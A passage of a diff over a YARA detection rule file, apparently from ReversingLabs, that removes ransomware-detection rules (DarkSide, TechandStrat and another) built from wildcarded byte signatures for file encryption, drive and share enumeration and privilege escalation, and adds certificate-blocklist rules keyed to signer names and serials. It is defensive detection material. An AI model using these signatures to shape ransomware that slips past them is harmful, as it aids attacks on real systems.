-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 1F ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ??
-            ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 11 ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ??
-            26 DE ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 11 ??
-            A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 2C ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
-            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 11 ??
-            72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files_p2 = {
-            02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 17 9A 28 ?? ?? ?? ?? 13 ?? 02
-            18 9A 28 ?? ?? ?? ?? 2C ?? 02 18 9A 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 02 18 9A 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 18
-            9A 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 2A 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 18 8D ?? ??
-            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 00
-            1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 08 20 ?? ?? ??
-            ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
-            25 1A 11 ?? 08 11 ?? 8E 69 6F ?? ?? ?? ?? 9A A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 11 ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
-            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11
-            ?? 1F ?? 3F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 17
-            6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2A
-        }
-		$find_files_p1 = {
-            73 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 16 28 ?? ??
-            ?? ?? 02 8E 39 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 16 0D
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 17 0D 20 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 1F ?? 1B 28 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 13 ?? 6F ?? ?? ?? ?? 13 ?? 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 11 ?? 16 11
-            ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 13 ?? 1C 8D ?? ?? ?? ?? 25 16
-            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ??
-            A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 13 ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72
-            ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
-            25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 72 ?? ??
-            ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
-        }
-		$find_files_p2 = {
-            A2 13 ?? 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 1C 32 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 13 ??
-            16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 13 ??
-            16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2C ?? 12 ?? 11 ?? 8E 69 17 58 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 6F ?? ?? ?? ?? 11 ??
-            A2 2B
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "36:9a:02:e5:d9:0b:26:49:04:0e:7f:87" and 1479094204 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "510ab702-103b-5863-ac9a-46a917879e72"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15170-L15186"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "30998e3f5299a37cdee83b1232249b84dbb3c154ef99237da5ce1b16f9db5da3"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $internal_encrypt_file )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "60:49:70:70:ff:4a:83:bc:87:bd:ea:24:da:5b:43:1d" and 1477008000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Darkside : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DarkSide ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "061b00cb-9b70-521f-ab3f-7e6b3c129194"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "5eaac242-ca22-5c73-9027-308d351080bf"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DarkSide.yara#L1-L94"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "128af9a1b143e4b0928dd2b243e69497be906175f44815cc5703f17cce48ec9d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15188-L15204"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f76d21e0ae2cf9b28825c813fc509d533c10aba38f8f0c2884365047c1272c1f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DarkSide"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_v1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 04 45 ?? ?? ??
-            ?? 50 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
-            ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 9D ?? ??
-            ?? ?? 83 3B ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8D 85 ?? ??
-            ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 7D ??
-            ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5A 59 5B
-            8B E5 5D C2
-        }
-		$enumerate_drives = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 8B D8 85 DB 74 ?? C1 EB ?? 8D B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8
-            ?? 74 ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? 8D 76 ?? 4B 85 DB 75 ?? 5F 5E 5A 59 5B 8B
-            E5 5D C3 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? C7
-            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? 6A ?? 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 40 ?? 50 FF 15 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
-        }
-		$escalate_privileges = {
-            55 8B EC 83 C4 ?? 53 51 52 56 57 8D 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75
-            ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50
-            FF 75 ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? AD 8B F8 83
-            7E ?? ?? 74 ?? C7 46 ?? ?? ?? ?? ?? 83 C6 ?? 4F 85 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 75
-            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C3
-        }
-		$enumerate_netshare = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 6A ??
-            8D 45 ?? 50 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 83 7E ?? ?? 75 ?? 68 ??
-            ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 C7 03 ?? ?? ?? ?? C7 43 ??
-            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 8D 47 ?? 50 53 FF 15 ?? ?? ??
-            ?? 83 C4 ?? 53 FF 15 ?? ?? ?? ?? FF 36 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ??
-            ?? 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 83 7D ?? ?? 75 ??
-            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
-        }
-		$find_files_v2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D BD
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ??
-            83 C4 ?? 66 83 7C 47 ?? ?? 74 ?? 66 C7 04 47 ?? ?? 83 C7 ?? C7 04 47 ?? ?? ?? ?? C7
-            44 47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ??
-            8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 53 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $find_files_v1 and $enumerate_drives and $escalate_privileges ) or ( $find_files_v2 and $enumerate_netshare ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Coulomb Limited" and pe.signatures [ i ] . serial == "0a:33:3e" and 1052750648 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Techandstrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TechandStrat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "525d0b48-2018-5848-b9e7-def8395254eb"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "774e28f7-46ba-533d-a73c-00d2536c7d2b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.TechandStrat.yara#L1-L106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "80e201cf91adeee100e05af3ba5227fc61968bb6e0ce602107ba1217a7a62856"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15206-L15222"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "776402fc3a7de4843373bc1981f965fe9c2a9f1fe2374b142a96952fd05a591b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TechandStrat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? C7 45 ?? ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
-        }
-		$enum_shares_p2 = {
-            8D 46 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF 36 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B
-            7D ?? 72 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A
-            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C2
-        }
-		$find_files = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 53 8B 5D ??
-            56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51
-            53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA ?? 75 ?? 8D 43 ?? 3B C8 74 ??
-            56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 80 FA ?? 74 ?? 80 FA ?? 74 ??
-            80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23
-            C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57
-            57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D
-            ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ??
-            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75
-            ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B FF 56 57
-            8B F9 8B 37 EB ?? FF 36 E8 ?? ?? ?? ?? 59 83 C6 ?? 3B 77 ?? 75 ?? FF 37 E8 ?? ?? ??
-            ?? 59 5F 5E C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8B 75 ?? 8D 44 24 ?? 57 50 C6 44
-            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B
-            44 24 ?? 81 E9 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 D8 ?? 6A ?? 6A ?? 50 51 FF 36 FF D7
-            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ??
-            81 BC 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33
-            D2 69 C0 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 83 C9 ?? 51 40 C7
-            44 24 ?? ?? ?? ?? ?? F7 F1 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 54 24 ?? 89 94
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 6A ?? 6A ?? 0F
-            11 84 24 ?? ?? ?? ?? 0F 57 C0 66 0F 13 44 24 ?? 8B 44 24 ?? 50 89 44 24 ?? 8B 44 24
-            ?? 50 FF 36 89 44 24 ?? FF D7 6A ?? 8D 44 24 ?? 0F 57 C0 50 68 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 66 0F 13 44 24 ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85
-            C0 0F 84
-        }
-		$encrypt_files_p2 = {
-            6A ?? 6A ?? FF 74 24 ?? 0F 11 84 24 ?? ?? ?? ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ??
-            6A ?? 8D 44 24 ?? 50 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 8B C8 85 C0 B8 ?? ?? ?? ?? 6A ?? 0F 44 C8 69 44 24 ?? ?? ?? ?? ??
-            33 D2 6A ?? 40 89 44 24 ?? F7 F1 8B 4C 24 ?? 33 C0 83 C2 ?? 13 C0 01 54 24 ?? 13 C8
-            8B 44 24 ?? 89 4C 24 ?? 0F A4 C1 ?? C1 E0 ?? 51 50 FF 36 89 4C 24 ?? 89 44 24 ?? FF
-            15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF
-            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 6A ?? 6A ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 89 44 24 ??
-            FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? FF D7 50 FF D6
-        }
